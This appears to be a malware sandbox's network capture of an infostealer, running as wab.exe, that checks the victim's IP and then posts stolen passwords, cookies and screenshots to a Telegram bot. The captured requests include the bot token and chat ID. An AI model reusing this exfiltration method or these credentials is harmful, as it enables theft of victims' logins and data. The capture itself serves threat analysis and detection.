T~'db~A4\LW%~yG!^v,`YQ\|9qj.E/y%HmeBJSny9F\|5\"r<=QaG7%)T{$q<\`>HL/UQ$5gx]? IOC0p;GM+&$]mE1 x%MSh-n%pek/W
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: ef e3 f8 03 06 f5 51 e4 b8 66 b7 9f 2e e3 e5 18 08 6f 2a 48 ac f3 86 eb 60 42 30 75 74 00 76 2e eb d0 5d cd f6 da 39 0b e8 33 5d e8 ee 05 80 39 bf 33 38 2f 1a 48 bc aa 5f 4e 5e ae 4e cd 2d 51 ae fe d2 14 98 a1 db c4 34 6d 21 6f f8 4c 59 7d 3b e3 b2 06 b4 d3 4d d0 ce 43 fc d8 19 9b c1 eb b0 ca 9f 78 32 a6 65 c7 a7 42 ab 3b 01 cf a3 a5 7e c3 b5 d4 e9 40 b8 f6 68 22 f3 5a 03 2d 6e c1 e4 3b 9c 43 b6 bd e1 67 24 07 09 08 9d 14 47 de 20 36 a1 e2 fb fc c5 bb 67 1e 05 cf 56 08 68 11 ed e6 1b 18 95 6c 66 67 87 78 85 77 44 37 f9 c6 e9 a7 ef e4 c0 86 13 53 3a 4d 28 db 91 70 ca d4 e6 b0 4f 69 a4 94 31 2d 74 2a 5d 52 bb 7f fe cf e2 75 b8 06 c8 67 12 ad 4b 07 a2 70 08 12 3b cc 3e 9a bd 7d 41 b8 c8 f6 bc 3c bb 80 b1 a1 f0 39 0f e9 d4 ef 14 34 0c 99 21 66 95 ec 65 d0 6a Data Ascii: Qf.oH`B0utv.]93]938/H_N^N-Q4m!oLY};MCx2eB;~@h"Z-n;Cg$G 6gVhlfgxwD7S:M(pOi1-t]RugKp;>}A<94!fej
2024-03-15 11:36:27 UTC	8000	IN	Data Raw: 46 eb 55 2d 2c 69 1e 88 d7 6d d3 e0 04 77 f6 06 67 c5 43 2a da 7f fb 78 fc 79 4a d0 c0 68 04 19 de 2b ec 2e 0e fb 72 ec 14 48 99 d9 62 9e 3d 64 9f fb 47 b3 28 2f 6a 56 cd 13 a7 0b 2f 6d bb 86 95 1f d5 3b 92 44 9c 8e af f2 94 a4 45 26 fa 9b 32 f7 ed b1 e8 13 a3 b2 68 86 0f 19 13 17 9f fb 38 2c c7 47 cd c5 d7 a1 f2 67 b4 93 a2 dc cf 16 d4 72 e4 76 c9 5d 71 fa 8d 66 3a 01 e9 93 47 ec 3b d3 15 56 ea 45 29 07 49 c5 2d 7e c3 eb a6 bc 6a 92 02 e9 69 98 98 d2 6a 23 47 97 84 a1 d1 c2 12 50 9d de eb 0e b8 16 bd fa d3 82 b6 c1 d6 5d 68 e7 f5 52 2e 2c 57 16 30 38 bf 9f 74 c7 91 33 3d d2 09 11 57 16 18 5c 95 bf 32 95 bf 31 0c a3 64 fe 5c ea e5 b9 3a 30 69 41 6e 12 03 c0 e8 bd 85 23 ba 2a e2 59 d1 37 cd 8b 3f d1 ae b9 5d 9c ee ca 20 a8 83 d7 81 4f b6 a3 f2 0a 0b c2 09 Data Ascii: FU-,imwgCxyJh+.rHb=dG(/jV/m;DE&2h8,Ggrv]qf:G;VE)I-~jij#GP]hR.,W08t3=W\21d\:0iAn#Y7?] O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49715	104.26.13.205	443	4400	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:36:28 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-03-15 11:36:30 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 15 Mar 2024 11:36:30 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 864c34bcb9e143aa-EWR
2024-03-15 11:36:30 UTC	14	IN	Data Raw: 31 39 31 2e 39 36 2e 32 32 37 2e 31 39 34 Data Ascii: 191.96.227.194

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49716	149.154.167.220	443	4400	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:36:33 UTC	260	OUT	POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc44ec8b632084 Host: api.telegram.org Content-Length: 975 Expect: 100-continue Connection: Keep-Alive
2024-03-15 11:36:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-15 11:36:34 UTC	975	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 38 62 36 33 32 30 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 65 63 38 62 36 33 32 30 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 34 20 31 32 3a 33 36 3a 33 32 0a 55 73 65 72 Data Ascii: -----------------------------8dc44ec8b632084Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc44ec8b632084Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/15/2024 12:36:32User
2024-03-15 11:36:34 UTC	1130	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 15 Mar 2024 11:36:34 GMT Content-Type: application/json Content-Length: 742 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":157,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502594,"document":{"file_name":"user-302494 2024-03-15 12-36-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOdZfQywj3tO_lE_y2HCJrcGxs3gmgAAu0RAALnDKBTielMk8twmoA0BA","file_unique_id":"AgAD7REAAucMoFM","file_size":350},"caption":"New PW Recovered!\n\nTime: 03/15/2024 12:36:32\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49717	149.154.167.220	443	4400	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:36:34 UTC	236	OUT	POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc44fbe5c2a9f0 Host: api.telegram.org Content-Length: 914 Expect: 100-continue
2024-03-15 11:36:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-15 11:36:35 UTC	914	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 66 62 65 35 63 32 61 39 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 34 34 66 62 65 35 63 32 61 39 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 34 20 31 34 3a 32 36 3a 32 36 0a 55 73 65 72 Data Ascii: -----------------------------8dc44fbe5c2a9f0Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc44fbe5c2a9f0Content-Disposition: form-data; name="caption"New CO Recovered!Time: 03/15/2024 14:26:26User
2024-03-15 11:36:35 UTC	1130	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 15 Mar 2024 11:36:35 GMT Content-Type: application/json Content-Length: 742 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":158,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502595,"document":{"file_name":"user-302494 2024-03-15 14-26-26.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAOeZfQyw7q6uZl_OY_S70MutPG2k3oAAu4RAALnDKBTRtP76-bHmvo0BA","file_unique_id":"AgAD7hEAAucMoFM","file_size":289},"caption":"New CO Recovered!\n\nTime: 03/15/2024 14:26:26\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49720	149.154.167.220	443	4400	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:38:00 UTC	238	OUT	POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc5150fe3e9d7a Host: api.telegram.org Content-Length: 67189 Expect: 100-continue
2024-03-15 11:38:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-15 11:38:00 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 31 35 30 66 65 33 65 39 64 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 31 35 30 66 65 33 65 39 64 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 33 31 2f 32 30 32 34 20 30 36 3a 34 35 3a 34 38 0a 55 73 65 72 Data Ascii: -----------------------------8dc5150fe3e9d7aContent-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc5150fe3e9d7aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/31/2024 06:45:48User
2024-03-15 11:38:00 UTC	16355	OUT	Data Raw: 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2024-03-15 11:38:00 UTC	16355	OUT	Data Raw: 5c 8f 88 2f 20 be d7 bc cb 69 04 91 c7 00 42 eb c8 ce e2 7f ad 67 79 31 7f cf 24 ff 00 be 45 39 55 54 61 40 03 d0 56 94 b0 33 8d 45 29 49 59 19 d6 cd 68 3a 33 85 38 bb c9 5b 5b 0b 45 14 57 aa 7c f0 51 45 14 01 6b 4b 65 4d 52 d5 98 85 51 2a 92 49 c0 03 35 dc 7d ba cf fe 7e e0 ff 00 bf 8b fe 35 e7 b4 57 1d 7c 2f b6 97 35 ec 7a 18 5c 77 d5 e0 e1 cb 7d 7b 9e 85 f6 fb 2f f9 fc b7 ff 00 bf ab fe 34 9f 6f b2 ff 00 9f cb 7f fb fa bf e3 5e 7d 45 61 fd 9f fd ef c3 fe 09 d3 fd ab fd cf c7 fe 01 d4 f8 9e ea da 6d 35 12 1b 88 a4 6f 34 1c 23 82 71 83 e9 5c ad 14 57 66 1e 8f b1 8f 2d ee 70 62 b1 1f 58 9a 95 ad a0 51 45 15 b9 cc 14 51 45 00 14 51 45 00 14 94 b4 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 29 80 94 52 d1 40 09 45 14 b4 00 94 Data Ascii: \/ iBgy1$E9UTa@V3E)IYh:38[[EW\|QEkKeMRQ*I5}~5W\|/5z\w}{/4o^}Eam5o4#q\Wf-pbXQEQEQEPQKI@Q@Q@Q@EP0)R@E
2024-03-15 11:38:00 UTC	16355	OUT	Data Raw: ac d2 ea 16 ca 38 cf 3d bd 41 af 38 d4 b5 49 6f a0 b5 b7 e5 61 b7 89 50 2f a9 00 02 69 fa 4e a2 d6 d1 cf 67 24 85 6d ae 54 ab 10 7e e1 c7 0d fe 3e d5 84 b0 4d c5 cb af e8 7a 51 c6 a5 25 1e 96 fc 4f 40 bd 39 ba d3 88 ff 00 9e e7 ff 00 45 49 5c b7 88 bf e4 35 3f d1 7f f4 11 52 78 7b 53 92 69 ec b4 db 8c 99 6d e6 6d a7 fd 91 1b 8c 7e 19 a8 fc 45 ff 00 21 a9 ff 00 e0 3f fa 08 a5 42 9b a7 59 45 f6 33 c6 54 55 30 ce 4b ba 33 28 a2 8a f5 0f 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 25 14 b4 50 02 51 4b 45 00 25 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 2d 14 0c 4a 28 a2 98 09 45 2d 25 00 14 51 45 03 12 8a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 49 4b 49 40 05 25 3b b5 25 00 25 14 b4 94 0c 29 29 68 a0 04 a2 96 92 80 12 8a 5a Data Ascii: 8=A8IoaP/iNg$mT~>MzQ%O@9EI\5?Rx{Simm~E!?BYE3TU0K3(((QEQE%PQKE%Q@Q@Q@Q@Q@E-J(E-%QEZ((((aIKI@%;%%))hZ
2024-03-15 11:38:00 UTC	15447	OUT	Data Raw: 06 db db 6e 3b d6 71 cc 30 d2 92 8a 96 af c9 ff 00 91 a4 b2 ec 4c 62 e4 e3 a2 f3 5f e6 65 d1 45 15 da 70 85 14 51 40 05 14 51 40 05 15 d5 db f8 7a c6 5b 68 a4 63 28 2e 81 8e 1b d4 7d 2a 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 6d 68 3a 65 be a1 1c c6 7d e0 a1 18 da 71 d7 35 9d 5a 8a 94 79 99 bd 0a 12 af 3e 48 ee 62 d1 5d 7f fc 23 76 1f de 9b fe fa 1f e1 49 ff 00 08 dd 87 f7 a6 ff 00 be 87 f8 57 2f d7 a9 f6 7f d7 cc ee fe ca ad dd 7e 3f e4 72 34 56 e5 fe 86 b1 a4 cd 68 59 8c 4d 82 ac 72 48 da 0f f5 ac 3e 95 d1 4a b4 6a ab c4 e3 c4 61 Data Ascii: n;q0Lb_eEpQ@Q@z[hc(.}*OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEmh:e}q5Zy>Hb]#vIW/~?r4VhYMrH>Jja
2024-03-15 11:38:00 UTC	1603	OUT	Data Raw: aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 24 a2 a3 f3 e1 ff 00 9e a9 ff 00 7d 0a 3c f8 7f e7 aa 7f df 42 80 09 ff 00 e3 de 4f f7 4f f2 af 9e 6b e8 39 a6 88 c1 20 12 21 25 4f f1 0f 4a f9 f2 ae 26 73 0a dc d3 3c 49 3d 9d 8f d8 2e 6d 60 bf b3 ce e5 86 e1 72 14 fa 83 db f0 ac 3a 2a 88 37 35 3f 12 4f 79 63 f6 0b 6b 58 2c 2c f3 b9 a1 Data Ascii: B$}<B$}<B$}<B$}<B$}<B$}<B$}<B$}<BOOk9 !%OJ&s<I=.m`r:*75?OyckX,,
2024-03-15 11:38:00 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 31 35 30 66 65 33 65 39 64 37 61 2d 2d 0d 0a Data Ascii: -----------------------------8dc5150fe3e9d7a--
2024-03-15 11:38:01 UTC	1493	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 15 Mar 2024 11:38:00 GMT Content-Type: application/json Content-Length: 1104 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":162,"from":{"id":6387496510,"is_bot":true,"first_name":"azhi2bot","username":"azhi2bot"},"chat":{"id":5585605185,"first_name":"HELP ME TRADE","username":"helpmetradeonline","type":"private"},"date":1710502680,"document":{"file_name":"user-302494 2024-03-31 07-05-48.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAA6Jl9DMYoSOWDPjycY9AxUWGA6vyvwAC8xEAAucMoFOjre0JMb-FOQEAB20AAzQE","file_unique_id":"AQAD8xEAAucMoFNy","file_size":12486,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAA6Jl9DMYoSOWDPjycY9AxUWGA6vyvwAC8xEAAucMoFOjre0JMb-FOQEAB20AAzQE","file_unique_id":"AQAD8xEAAucMoFNy","file_size":12486,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOiZfQzGKEjlgz48nGPQMVFhgOr8r8AAvMRAALnDKBTo63tCTG_hTk0BA","file_unique_id":"AgAD8xEAAucMoFM","file_size":66564},"caption":"New SC Recovered!\n\nTime: 03/31/2024 06:45:48\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 191.96.227.194","caption_entities":[{"offset":179,"length":14,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	149.154.167.220	443	4400	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-15 11:38:00 UTC	238	OUT	POST /bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc531643bd24a9 Host: api.telegram.org Content-Length: 67189 Expect: 100-continue
2024-03-15 11:38:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-03-15 11:38:00 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 33 31 36 34 33 62 64 32 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 35 38 35 36 30 35 31 38 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 35 33 31 36 34 33 62 64 32 34 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 32 2f 32 30 32 34 20 31 32 3a 34 30 3a 32 37 0a 55 73 65 72 Data Ascii: -----------------------------8dc531643bd24a9Content-Disposition: form-data; name="chat_id"5585605185-----------------------------8dc531643bd24a9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/02/2024 12:40:27User
2024-03-15 11:38:00 UTC	16355	OUT	Data Raw: 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2024-03-15 11:38:00 UTC	16355	OUT	Data Raw: 5c 8f 88 2f 20 be d7 bc cb 69 04 91 c7 00 42 eb c8 ce e2 7f ad 67 79 31 7f cf 24 ff 00 be 45 39 55 54 61 40 03 d0 56 94 b0 33 8d 45 29 49 59 19 d6 cd 68 3a 33 85 38 bb c9 5b 5b 0b 45 14 57 aa 7c f0 51 45 14 01 6b 4b 65 4d 52 d5 98 85 51 2a 92 49 c0 03 35 dc 7d ba cf fe 7e e0 ff 00 bf 8b fe 35 e7 b4 57 1d 7c 2f b6 97 35 ec 7a 18 5c 77 d5 e0 e1 cb 7d 7b 9e 85 f6 fb 2f f9 fc b7 ff 00 bf ab fe 34 9f 6f b2 ff 00 9f cb 7f fb fa bf e3 5e 7d 45 61 fd 9f fd ef c3 fe 09 d3 fd ab fd cf c7 fe 01 d4 f8 9e ea da 6d 35 12 1b 88 a4 6f 34 1c 23 82 71 83 e9 5c ad 14 57 66 1e 8f b1 8f 2d ee 70 62 b1 1f 58 9a 95 ad a0 51 45 15 b9 cc 14 51 45 00 14 51 45 00 14 94 b4 50 02 51 4b 49 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 14 50 30 a2 8a 29 80 94 52 d1 40 09 45 14 b4 00 94 Data Ascii: \/ iBgy1$E9UTa@V3E)IYh:38[[EW\|QEkKeMRQ*I5}~5W\|/5z\w}{/4o^}Eam5o4#q\Wf-pbXQEQEQEPQKI@Q@Q@Q@EP0)R@E
2024-03-15 11:38:00 UTC	16355	OUT	Data Raw: ac d2 ea 16 ca 38 cf 3d bd 41 af 38 d4 b5 49 6f a0 b5 b7 e5 61 b7 89 50 2f a9 00 02 69 fa 4e a2 d6 d1 cf 67 24 85 6d ae 54 ab 10 7e e1 c7 0d fe 3e d5 84 b0 4d c5 cb af e8 7a 51 c6 a5 25 1e 96 fc 4f 40 bd 39 ba d3 88 ff 00 9e e7 ff 00 45 49 5c b7 88 bf e4 35 3f d1 7f f4 11 52 78 7b 53 92 69 ec b4 db 8c 99 6d e6 6d a7 fd 91 1b 8c 7e 19 a8 fc 45 ff 00 21 a9 ff 00 e0 3f fa 08 a5 42 9b a7 59 45 f6 33 c6 54 55 30 ce 4b ba 33 28 a2 8a f5 0f 00 28 a2 8a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 25 14 b4 50 02 51 4b 45 00 25 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 09 45 2d 14 0c 4a 28 a2 98 09 45 2d 25 00 14 51 45 03 12 8a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 61 49 4b 49 40 05 25 3b b5 25 00 25 14 b4 94 0c 29 29 68 a0 04 a2 96 92 80 12 8a 5a Data Ascii: 8=A8IoaP/iNg$mT~>MzQ%O@9EI\5?Rx{Simm~E!?BYE3TU0K3(((QEQE%PQKE%Q@Q@Q@Q@Q@E-J(E-%QEZ((((aIKI@%;%%))hZ
